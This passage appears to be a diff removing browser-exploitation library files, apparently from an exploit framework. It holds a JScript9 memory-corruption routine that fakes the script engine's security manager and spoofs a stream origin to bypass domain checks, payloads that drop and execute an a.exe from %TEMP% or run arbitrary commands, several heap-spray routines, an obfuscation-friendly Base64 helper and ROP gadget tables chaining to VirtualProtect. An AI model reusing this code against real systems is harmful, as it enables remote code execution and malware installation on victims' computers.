var addr_names = base + this.read32( export_table + 32 );
|
||||
var addr_ordinals = base + this.read32( export_table + 36 );
|
||||
|
||||
for ( var i = 0; i < num_functions; ++ i ) {
|
||||
var name_addr = this.read32( addr_names + i * 4 ) + base;
|
||||
if ( this.strequal( name_addr, procname ) ) {
|
||||
var ordinal = this.read16( addr_ordinals + i * 2 );
|
||||
var result = this.read32( addr_functions + ordinal * 4 ) + base;
|
||||
return result;
|
||||
}
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
ExpLib.prototype.searchBytes = function(pattern, start, end) {
|
||||
|
||||
if ( start >= end || start + pattern.length > end )
|
||||
return 0;
|
||||
|
||||
var pos = start;
|
||||
while ( pos < end ) {
|
||||
for ( var i = 0; i < pattern.length; ++ i ) {
|
||||
if ( this.read8(pos + i) != pattern[i] )
|
||||
break;
|
||||
}
|
||||
|
||||
if ( i == pattern.length ) {
|
||||
return pos;
|
||||
}
|
||||
|
||||
++ pos;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
ExpLib.prototype.getError = function(msg) {
|
||||
return this.err_msg;
|
||||
}
|
||||
|
||||
ExpLib.prototype.setError = function(msg) {
|
||||
this.err_msg = msg;
|
||||
}
|
||||
|
||||
ExpLib.prototype.setStreamOrigin = function(offset) {
|
||||
this.stream_origin = offset;
|
||||
}
|
||||
|
||||
ExpLib.prototype.getStreamOrigin = function() {
|
||||
return this.stream_origin;
|
||||
}
|
||||
|
||||
ExpLib.prototype.memcpy = function(dst, src, size) {
|
||||
var i = 0;
|
||||
for ( ; i < size - 4; i += 4 ) {
|
||||
this.write32( dst + i, this.read32(src + i) );
|
||||
}
|
||||
|
||||
for ( ; i < size; ++ i ) {
|
||||
this.write8( dst + i, this.read8(src + i) );
|
||||
}
|
||||
}
|
||||
|
||||
ExpLib.prototype.go = function() {
|
||||
|
||||
var i = 0;
|
||||
|
||||
|
||||
|
||||
for ( ; i < this.arr_arr.length - 1; ++ i ) {
|
||||
this.arr_arr[i][this.arr_size + 0x1c / 4] = 0;
|
||||
|
||||
if ( this.arr_arr[i][this.arr_size + 0x18 / 4] == this.arr_size ) {
|
||||
this.arr_arr[i][this.arr_size + 0x14 / 4] = 0x3fffffff;
|
||||
this.arr_arr[i][this.arr_size + 0x18 / 4] = 0x3fffffff;
|
||||
|
||||
this.arr_arr[i + 1].length = 0x3fffffff;
|
||||
|
||||
if ( this.arr_arr[i+1].length == 0x3fffffff ) {
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
if ( i >= this.arr_arr.length - 1 ) {
|
||||
this.setError( "Cannot find array with corrupt length!" );
|
||||
return false;
|
||||
}
|
||||
|
||||
this.arr1_idx = i;
|
||||
this.arr2_idx = i + 1;
|
||||
|
||||
this.arr1 = this.arr_arr[i];
|
||||
this.arr2 = this.arr_arr[i + 1];
|
||||
|
||||
this.arr2_base = this.base + 0x1000;
|
||||
this.arr2_member_base = this.arr2_base + 0x20;
|
||||
|
||||
var func_addr = this.leakAddress(ActiveXObject);
|
||||
var script_engine_addr = this.read32(this.read32(func_addr + 0x1c) + 4);
|
||||
|
||||
//alert(script_engine_addr.toString(16));
|
||||
|
||||
var original_securitymanager = this.read32( script_engine_addr + 0x21c );
|
||||
if ( !original_securitymanager ) {
|
||||
// let security manager to be valid
|
||||
try {
|
||||
var WshShell = new ActiveXObject("WScript.shell");
|
||||
} catch (e) {}
|
||||
|
||||
original_securitymanager = this.read32( script_engine_addr + 0x21c );
|
||||
}
|
||||
|
||||
var original_securitymanager_vtable = this.read32(original_securitymanager);
|
||||
var securitymanager_size = 0x28;
|
||||
var fake_securitymanager = 0x1a1b2010;
|
||||
var fake_securitymanager_vtable = fake_securitymanager + 0x28;
|
||||
//alert(original_securitymanager.toString(16));
|
||||
|
||||
this.memcpy( fake_securitymanager, original_securitymanager, securitymanager_size );
|
||||
this.memcpy( fake_securitymanager_vtable, original_securitymanager_vtable, 0x70 );
|
||||
this.write32( fake_securitymanager, fake_securitymanager_vtable );
|
||||
this.write32(script_engine_addr + 0x21c, fake_securitymanager);
|
||||
|
||||
var jscript9_base = this.getModuleBase( this.read32(script_engine_addr) & 0xffff0000 );
|
||||
var jscript9_code_start = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x104);
|
||||
var jscript9_code_end = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x108);
|
||||
|
||||
|
||||
this.write32( fake_securitymanager_vtable + 0x14,
|
||||
this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x08], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 8; */
|
||||
|
||||
this.write32( fake_securitymanager_vtable + 0x10,
|
||||
this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x04], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 4; */
|
||||
|
||||
this.payload.execute(this);
|
||||
|
||||
|
||||
/*
|
||||
* restore
|
||||
*/
|
||||
|
||||
this.write32( script_engine_addr + 0x21c, original_securitymanager );
|
||||
|
||||
return true;
|
||||
|
||||
}
|
||||
|
||||
ExpLib.prototype.leakAddress = function(obj) {
|
||||
this.arr_arr[this.arr2_idx + 1][2] = obj;
|
||||
return this.read32(this.arr2_member_base + 0x1008);
|
||||
}
|
||||
|
||||
ExpLib.prototype.switchStreamOrigin = function(stream) {
|
||||
var obj = this.leakAddress(stream);
|
||||
var stream_obj = this.read32(obj + 0x30);
|
||||
//var url_addr = this.read32(stream_obj + 0x3c);
|
||||
var url_addr = this.read32(stream_obj + this.stream_origin);
|
||||
|
||||
/*
|
||||
* bypass domain check
|
||||
*/
|
||||
this.writeStringW( url_addr, 'file:///C:/1.htm' );
|
||||
}
|
||||
|
||||
return ExpLib;
|
||||
|
||||
})();
|
|
@ -1,33 +0,0 @@
|
|||
function payload_drop_exec(pe) {
|
||||
|
||||
this.execute = function(explib) {
|
||||
|
||||
var WshShell = new ActiveXObject("WScript.shell");
|
||||
var temp = WshShell.ExpandEnvironmentStrings("%TEMP%");
|
||||
var filename = temp + "\\a.exe";
|
||||
|
||||
var bStream = new ActiveXObject("ADODB.Stream");
|
||||
var txtStream = new ActiveXObject("ADODB.Stream");
|
||||
bStream.Type = 1;
|
||||
txtStream.Type = 2;
|
||||
|
||||
bStream.Open();
|
||||
txtStream.Open();
|
||||
|
||||
explib.switchStreamOrigin(txtStream);
|
||||
|
||||
txtStream.WriteText(pe);
|
||||
txtStream.Position = 2;
|
||||
txtStream.CopyTo( bStream );
|
||||
txtStream.Close();
|
||||
|
||||
explib.switchStreamOrigin(bStream);
|
||||
|
||||
bStream.SaveToFile(filename, 2);
|
||||
bStream.Close();
|
||||
|
||||
oExec = WshShell.Exec(filename);
|
||||
}
|
||||
|
||||
return this;
|
||||
}
|
|
@ -1,10 +0,0 @@
|
|||
function payload_exec(cmd) {
|
||||
|
||||
this.execute = function(explib) {
|
||||
|
||||
var WshShell = new ActiveXObject("WScript.shell");
|
||||
var oExec = WshShell.Exec(cmd);
|
||||
}
|
||||
|
||||
return this;
|
||||
}
|
|
@ -1,17 +0,0 @@
|
|||
var memory = new Array();
|
||||
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
|
||||
var index;
|
||||
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
|
||||
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
|
||||
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
|
||||
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
|
||||
|
||||
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
|
||||
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
|
||||
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
|
||||
|
||||
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
|
||||
for (index = 0; index < heapBlockCnt; index++) {
|
||||
memory[index] = retSlide + shellcode;
|
||||
}
|
||||
}
|
|
@ -1,192 +0,0 @@
|
|||
//heapLib2 namespace
|
||||
function heapLib2() { }
|
||||
|
||||
//These are attributes that will not actually create a bstr
|
||||
//and directly use the back-end allocator, completely bypassing the cache
|
||||
var global_attrs = ["title", "lang", "class"];
|
||||
|
||||
heapLib2.ie = function(element, maxAlloc)
|
||||
{
|
||||
//128mb
|
||||
this.maxAlloc = 0x8000000;
|
||||
|
||||
//make sure that an HTML DOM element is passed
|
||||
if(!element.nodeType || element.nodeType != 1)
|
||||
throw "alloc.argument: element not valid";
|
||||
|
||||
this.element = element;
|
||||
|
||||
if(maxAlloc)
|
||||
this.maxAlloc = maxAlloc;
|
||||
|
||||
//empty the cache
|
||||
this.Oleaut32EmptyCache();
|
||||
this.Oleaut32FillCache();
|
||||
this.Oleaut32EmptyCache();
|
||||
|
||||
}
|
||||
|
||||
heapLib2.ie.prototype.newelement = function(element)
|
||||
{
|
||||
//make sure that an HTML DOM element is passed
|
||||
if(!element.nodeType || element.nodeType != 1)
|
||||
throw "alloc.argument: element not valid";
|
||||
|
||||
this.element = element;
|
||||
}
|
||||
|
||||
heapLib2.ie.prototype.alloc = function(attr_name, size, cache_ok)
|
||||
{
|
||||
if(typeof(cache_ok)==='undefined')
|
||||
cache_ok = false;
|
||||
else
|
||||
cache_ok = true;
|
||||
|
||||
//make sure the attribute name is a string
|
||||
if(typeof attr_name != "string")
|
||||
throw "alloc.argument: attr_name is not a string";
|
||||
|
||||
//make sure that the attribute name is not already present in the html element
|
||||
if(this.element.getAttribute(attr_name))
|
||||
throw "alloc.argument: element already contains attr_name: " + attr_name;
|
||||
|
||||
//ensure the size is a number
|
||||
if(typeof size != "number")
|
||||
throw "alloc.argument: size is not a number: " + size;
|
||||
|
||||
//make sure the size isn't one of the special values
|
||||
if(!cache_ok && (size == 0x20 || size == 0x40 || size == 0x100 || size == 0x8000))
|
||||
throw "alloc.argument: size cannot be flushed from cache: " + size;
|
||||
|
||||
if(size > this.maxAlloc)
|
||||
throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
|
||||
|
||||
//the size must be at a 16-byte boundary this can be commented out but
|
||||
//the allocations will be rounded to the nearest 16-byte boundary
|
||||
if(size % 16 != 0)
|
||||
throw "alloc.argument: size be a multiple of 16: " + size;
|
||||
|
||||
//20-bytes will be added to the size
|
||||
//<4-byte size><data><2-byte null>
|
||||
size = ((size / 2) - 6);
|
||||
|
||||
//May have to change this due to allocation side effects
|
||||
var data = new Array(size).join(cache_ok ? "C" : "$");
|
||||
|
||||
var attr = document.createAttribute(attr_name);
|
||||
this.element.setAttributeNode(attr);
|
||||
this.element.setAttribute(attr_name, data);
|
||||
|
||||
}
|
||||
|
||||
//These items will allocate/free memory and should really
|
||||
//only be used once per element. You can use a new element
|
||||
//by calling the 'newelement' method above
|
||||
heapLib2.ie.prototype.alloc_nobstr = function(val)
|
||||
{
|
||||
//make sure the aval is a string
|
||||
if(typeof val != "string")
|
||||
throw "alloc.argument: val is not a string";
|
||||
|
||||
var size = (val.length * 2) + 6;
|
||||
|
||||
if(size > this.maxAlloc)
|
||||
throw "alloc_nobstr.val: string length cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
|
||||
|
||||
var i = 0;
|
||||
var set_gattr = 0;
|
||||
for(i = 0; i < global_attrs.length; i++)
|
||||
{
|
||||
curr_gattr = global_attrs[i];
|
||||
if(!this.element.getAttribute(curr_gattr))
|
||||
{
|
||||
this.element.setAttribute(curr_gattr, "");
|
||||
this.element.setAttribute(curr_gattr, val);
|
||||
set_gattr = 1;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if(set_gattr == 0)
|
||||
throw "alloc_nobstr: all global attributes are assigned, try a new element";
|
||||
}
|
||||
|
||||
//completely bypass the cache, useful for heap spraying (see heapLib2_test.html)
|
||||
heapLib2.ie.prototype.sprayalloc = function(attr_name, str)
|
||||
{
|
||||
//make sure the attribute name is a string
|
||||
if(typeof attr_name != "string")
|
||||
throw "alloc.argument: attr_name is not a string";
|
||||
|
||||
//make sure that the attribute name is not already present in the html element
|
||||
if(this.element.getAttribute(attr_name))
|
||||
throw "alloc.argument: element already contains attr_name: " + attr_name;
|
||||
|
||||
//ensure the size is a number
|
||||
if(typeof str != "string")
|
||||
throw "alloc.argument: str is not a string: " + typeof str;
|
||||
|
||||
var size = (str.length * 2) + 6;
|
||||
|
||||
//make sure the size isn't one of the special values
|
||||
if(size <= 0x8000)
|
||||
throw "alloc.argument: bigalloc must be greater than 0x8000: " + size;
|
||||
|
||||
if(size > this.maxAlloc)
|
||||
throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
|
||||
|
||||
var attr = document.createAttribute(attr_name);
|
||||
this.element.setAttributeNode(attr);
|
||||
this.element.setAttribute(attr_name, str);
|
||||
}
|
||||
|
||||
heapLib2.ie.prototype.free = function(attr_name, skip_flush)
|
||||
{
|
||||
if(typeof(skip_flush)==='undefined')
|
||||
skip_flush = false;
|
||||
else
|
||||
skip_flush = true;
|
||||
|
||||
//make sure that an HTML DOM element is passed
|
||||
if(!this.element.nodeType || this.element.nodeType != 1)
|
||||
throw "alloc.argument: element not valid";
|
||||
|
||||
//make sure the attribute name is a string
|
||||
if(typeof attr_name != "string")
|
||||
throw "alloc.argument: attr_name is not a string";
|
||||
|
||||
//make sure that the attribute name is not already present in the html element
|
||||
if(!this.element.getAttribute(attr_name))
|
||||
throw "alloc.argument: element does not contain attribute: " + attr_name;
|
||||
|
||||
//make sure the cache is full so the chunk returns the general purpose heap
|
||||
if(!skip_flush)
|
||||
this.Oleaut32FillCache();
|
||||
|
||||
this.element.setAttribute(attr_name, null);
|
||||
|
||||
if(!skip_flush)
|
||||
this.Oleaut32EmptyCache()
|
||||
}
|
||||
|
||||
heapLib2.ie.prototype.Oleaut32FillCache = function()
|
||||
{
|
||||
for(var i = 0; i < 6; i++)
|
||||
{
|
||||
this.free("cache0x20"+i, true);
|
||||
this.free("cache0x40"+i, true);
|
||||
this.free("cache0x100"+i, true);
|
||||
this.free("cache0x8000"+i, true);
|
||||
}
|
||||
}
|
||||
|
||||
heapLib2.ie.prototype.Oleaut32EmptyCache = function()
|
||||
{
|
||||
for(var i = 0; i < 6; i++)
|
||||
{
|
||||
this.alloc("cache0x20"+i, 0x20, true);
|
||||
this.alloc("cache0x40"+i, 0x40, true);
|
||||
this.alloc("cache0x100"+i, 0x100, true);
|
||||
this.alloc("cache0x8000"+i, 0x8000, true);
|
||||
}
|
||||
}
|
|
@ -1,31 +0,0 @@
|
|||
function mstime_malloc(oArg) {
|
||||
var shellcode = oArg.shellcode;
|
||||
var offset = oArg.offset;
|
||||
var heapBlockSize = oArg.heapBlockSize;
|
||||
var objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0; }
|
||||
if (heapBlockSize == undefined) { throw "Size must be defined"; }
|
||||
|
||||
var buf = "";
|
||||
for (var i=0; i < heapBlockSize/4; i++) {
|
||||
if (i == offset) {
|
||||
if (i == 0) { buf += shellcode; }
|
||||
else { buf += ";" + shellcode; }
|
||||
}
|
||||
else {
|
||||
buf += ";#W00TA";
|
||||
}
|
||||
}
|
||||
|
||||
var e = document.getElementById(objId);
|
||||
if (e == null) {
|
||||
var eleId = "W00TB"
|
||||
var acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
|
||||
document.body.innerHTML = document.body.innerHTML + acTag;
|
||||
e = document.getElementById(eleId);
|
||||
}
|
||||
try { e.values = buf; }
|
||||
catch (e) {}
|
||||
}
|
|
@ -1,38 +0,0 @@
|
|||
var sym_div_container;
|
||||
function sprayHeap( oArg ) {
|
||||
var shellcode = oArg.shellcode;
|
||||
var offset = oArg.offset;
|
||||
var heapBlockSize = oArg.heapBlockSize;
|
||||
var maxAllocs = oArg.maxAllocs;
|
||||
var objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0x00; }
|
||||
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
|
||||
if (maxAllocs == undefined) { maxAllocs = 0x350; }
|
||||
|
||||
if (offset > 0x800) { throw "Bad alignment"; }
|
||||
|
||||
sym_div_container = document.getElementById(objId);
|
||||
|
||||
if (sym_div_container == null) {
|
||||
sym_div_container = document.createElement("div");
|
||||
}
|
||||
|
||||
sym_div_container.style.cssText = "display:none";
|
||||
var data;
|
||||
junk = unescape("%u2020%u2020");
|
||||
while (junk.length < offset+0x1000) junk += junk;
|
||||
|
||||
data = junk.substring(0,offset) + shellcode;
|
||||
data += junk.substring(0,0x800-offset-shellcode.length);
|
||||
|
||||
while (data.length < heapBlockSize) data += data;
|
||||
|
||||
for (var i = 0; i < maxAllocs; i++)
|
||||
{
|
||||
var obj = document.createElement("button");
|
||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
||||
sym_div_container.appendChild(obj);
|
||||
}
|
||||
}
|
|
@ -1,18 +0,0 @@
|
|||
function ajax_download(oArg) {
|
||||
if (!oArg.method) { oArg.method = "GET"; }
|
||||
if (!oArg.path) { throw "Missing parameter 'path'"; }
|
||||
if (!oArg.data) { oArg.data = null; }
|
||||
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
|
||||
if (xmlHttp.overrideMimeType) {
|
||||
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
|
||||
}
|
||||
|
||||
xmlHttp.open(oArg.method, oArg.path, false);
|
||||
xmlHttp.send(oArg.data);
|
||||
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
|
||||
return xmlHttp.responseText;
|
||||
}
|
||||
return null;
|
||||
}
|
|
@ -1,18 +0,0 @@
|
|||
function postInfo(path, data, cb) {
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
|
||||
if (xmlHttp.overrideMimeType) {
|
||||
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
|
||||
}
|
||||
|
||||
xmlHttp.open('POST', path, !!cb);
|
||||
|
||||
if (cb) {
|
||||
xmlHttp.onreadystatechange = function() {
|
||||
if (xmlHttp.readyState == 4) { cb.apply(this, arguments); }
|
||||
};
|
||||
}
|
||||
|
||||
xmlHttp.send(data);
|
||||
return xmlHttp;
|
||||
}
|
|
@ -1,15 +0,0 @@
|
|||
if (!window.XMLHTTPRequest) {
|
||||
(function() {
|
||||
var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
|
||||
for (idx = 0; idx < activeObjs.length; idx++) {
|
||||
try {
|
||||
new ActiveXObject(activeObjs[idx]);
|
||||
window.XMLHttpRequest = function() {
|
||||
return new ActiveXObject(activeObjs[idx]);
|
||||
};
|
||||
break;
|
||||
}
|
||||
catch (e) {}
|
||||
}
|
||||
})();
|
||||
}
|
|
@ -1,126 +0,0 @@
|
|||
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
|
||||
// variable names changed to make obfuscation easier
|
||||
var Base64 = {
|
||||
// private property
|
||||
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
|
||||
|
||||
// private method
|
||||
_utf8_encode : function ( input ){
|
||||
input = input.replace(/\r\n/g,"\\n");
|
||||
var utftext = "";
|
||||
var input_idx;
|
||||
|
||||
for (input_idx = 0; input_idx < input.length; input_idx++) {
|
||||
var chr = input.charCodeAt(input_idx);
|
||||
if (chr < 128) {
|
||||
utftext += String.fromCharCode(chr);
|
||||
}
|
||||
else if((chr > 127) && (chr < 2048)) {
|
||||
utftext += String.fromCharCode((chr >> 6) | 192);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
} else {
|
||||
utftext += String.fromCharCode((chr >> 12) | 224);
|
||||
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
}
|
||||
}
|
||||
|
||||
return utftext;
|
||||
},
|
||||
|
||||
// public method for encoding
|
||||
encode : function( input ) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
|
||||
var input_idx = 0;
|
||||
|
||||
input = Base64._utf8_encode(input);
|
||||
|
||||
while (input_idx < input.length) {
|
||||
chr1 = input.charCodeAt( input_idx++ );
|
||||
chr2 = input.charCodeAt( input_idx++ );
|
||||
chr3 = input.charCodeAt( input_idx++ );
|
||||
|
||||
enc1 = chr1 >> 2;
|
||||
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
|
||||
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
|
||||
enc4 = chr3 & 63;
|
||||
|
||||
if (isNaN(chr2)) {
|
||||
enc3 = enc4 = 64;
|
||||
} else if (isNaN(chr3)) {
|
||||
enc4 = 64;
|
||||
}
|
||||
output = output +
|
||||
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
|
||||
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
|
||||
}
|
||||
return output;
|
||||
},
|
||||
// public method for decoding
|
||||
decode : function (input) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3;
|
||||
var enc1, enc2, enc3, enc4;
|
||||
var i = 0;
|
||||
|
||||
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
|
||||
|
||||
while (i < input.length) {
|
||||
|
||||
enc1 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc2 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc3 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc4 = this._keyStr.indexOf(input.charAt(i++));
|
||||
|
||||
chr1 = (enc1 << 2) | (enc2 >> 4);
|
||||
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
|
||||
chr3 = ((enc3 & 3) << 6) | enc4;
|
||||
|
||||
output = output + String.fromCharCode(chr1);
|
||||
|
||||
if (enc3 != 64) {
|
||||
output = output + String.fromCharCode(chr2);
|
||||
}
|
||||
if (enc4 != 64) {
|
||||
output = output + String.fromCharCode(chr3);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
output = Base64._utf8_decode(output);
|
||||
|
||||
return output;
|
||||
|
||||
},
|
||||
_utf8_decode : function (utftext) {
|
||||
var string = "";
|
||||
var input_idx = 0;
|
||||
var chr1 = 0;
|
||||
var chr2 = 0;
|
||||
var chr3 = 0;
|
||||
|
||||
while ( input_idx < utftext.length ) {
|
||||
|
||||
chr1 = utftext.charCodeAt(input_idx);
|
||||
|
||||
if (chr1 < 128) {
|
||||
string += String.fromCharCode(chr1);
|
||||
input_idx++;
|
||||
}
|
||||
else if((chr1 > 191) && (chr1 < 224)) {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
|
||||
input_idx += 2;
|
||||
} else {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
chr3 = utftext.charCodeAt(input_idx+2);
|
||||
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
|
||||
input_idx += 3;
|
||||
}
|
||||
}
|
||||
|
||||
return string;
|
||||
}
|
||||
|
||||
};
|
|
@ -1,80 +0,0 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>11.3.300.257</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x10000000">
|
||||
<gadget offset="0x00243043">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x006e3384">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x0044a4aa">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
|
||||
<gadget offset="0x003d54df">XCHG EAX,ESI # RETN</gadget>
|
||||
<gadget offset="0x005f0b25">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x002ed0f1">jmp esp</gadget>
|
||||
<gadget offset="0x003eb988">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x00662e60">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x0058289d">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x00955ebe">Writable location</gadget>
|
||||
<gadget offset="0x00414e84">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x004de801">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x0024044c">POP EAX # RETN</gadget>
|
||||
<gadget value="nop">nop</gadget>
|
||||
<gadget offset="0x00627674">PUSHAD # RETN</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>11.3.300.265</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x10000000">
|
||||
<gadget offset="0x00487414">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x006e338c">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x00437d39">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
|
||||
<gadget offset="0x0008f9c6">XCHG EAX,ESI # RETN</gadget>
|
||||
<gadget offset="0x000baf77">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x002d8d5c">jmp esp</gadget>
|
||||
<gadget offset="0x00005604">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x0064a4d7">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x004087db">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x00955197">Writable location</gadget>
|
||||
<gadget offset="0x005be57f">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x003a0002">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x00244a82">POP EAX # RETN</gadget>
|
||||
<gadget value="nop">nop</gadget>
|
||||
<gadget offset="0x004cbc7f">PUSHAD # RETN</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>11.3.300.268</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x10000000">
|
||||
<gadget offset="0x0012429b">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x006e438c">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x00481a7d">MOV EAX,DWORD PTR DS:[ECX]</gadget>
|
||||
<gadget offset="0x006ae8d7">XCHG EAX,ESI # RETN</gadget>
|
||||
<gadget offset="0x000a6b69">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x002b95bb">jmp esp</gadget>
|
||||
<gadget offset="0x0027f328">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x00686fe5">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x0017e345">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0092027a">Writable location</gadget>
|
||||
<gadget offset="0x002a394a">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00593802"># RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x002447d1">POP EAX # RETN</gadget>
|
||||
<gadget value="nop">nop</gadget>
|
||||
<gadget offset="0x0062857d">PUSHAD # RETN</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
</db>
|
|
@ -1,66 +0,0 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>2007</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x51bd0000">
|
||||
<gadget offset="0x000750fd">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x0001803c">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x0001803c">skip 4 bytes</gadget>
|
||||
<gadget offset="0x0001750f">POP EBX # RETN</gadget>
|
||||
<gadget value="safe_negate_size">Safe size to NEG</gadget>
|
||||
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
|
||||
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
|
||||
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
|
||||
<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
|
||||
<gadget value="ffffffc0">0x00000040</gadget>
|
||||
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
|
||||
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x000406e9">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0008bfae">Writable location</gadget>
|
||||
<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
|
||||
<gadget offset="0x0002c840">JMP [EAX]</gadget>
|
||||
<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
|
||||
<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>2010</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x51bd0000">
|
||||
